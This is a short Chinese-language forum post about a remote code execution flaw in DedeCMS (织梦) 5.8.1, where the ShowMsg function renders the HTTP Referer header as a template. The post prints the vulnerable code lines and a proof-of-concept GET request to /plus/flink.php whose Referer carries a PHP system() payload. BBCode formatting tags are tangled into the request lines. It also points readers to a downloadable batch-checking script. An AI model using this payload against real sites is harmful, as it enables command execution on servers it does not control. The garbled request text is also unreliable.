电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

[WEB前端技术] 织梦5.8.1 RCE漏洞

[复制链接]
zhaorong 发表于 2021-10-23 14:52:04 | 显示全部楼层 |阅读模式
织梦5.8.1 RCE漏洞

在include\common.func.php文件中的ShowMsg函数存在模板注入

224648rd8v79d9tg0f275d.png

  1. $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
复制代码

从Referer头中取值,然后进行渲染 造成RCE
  1. $tpl = new DedeTemplate();
  2. $tpl->LoadString($msg);
复制代码

POC:
  1. GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
  2. Host: 10.211.55.3[/size][/font][/color][/align][align=left][font=Optima-Regular, Optima, PingFangSC-light
  3. PingFangTC-light, PingFang SC, Cambria, Cochin, Georgia, Times, Times New Roman, serif][color=#3f3f3
  4. f]cookie:[/color][/font]PHPSESSID=ferfe1a0k6qd5u9ol5gbd6nieu[/align][align=left][color=rgb(63, 63, 63
  5. )][font=Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &quot][size=16px]Referer: <?ph
  6. p "system"($c);die;/*
复制代码

如果有人懒的话 可以直接下载现成的PHP批量检测

225021ohf4oczv26otfmdo.png
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-3-14 04:27

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表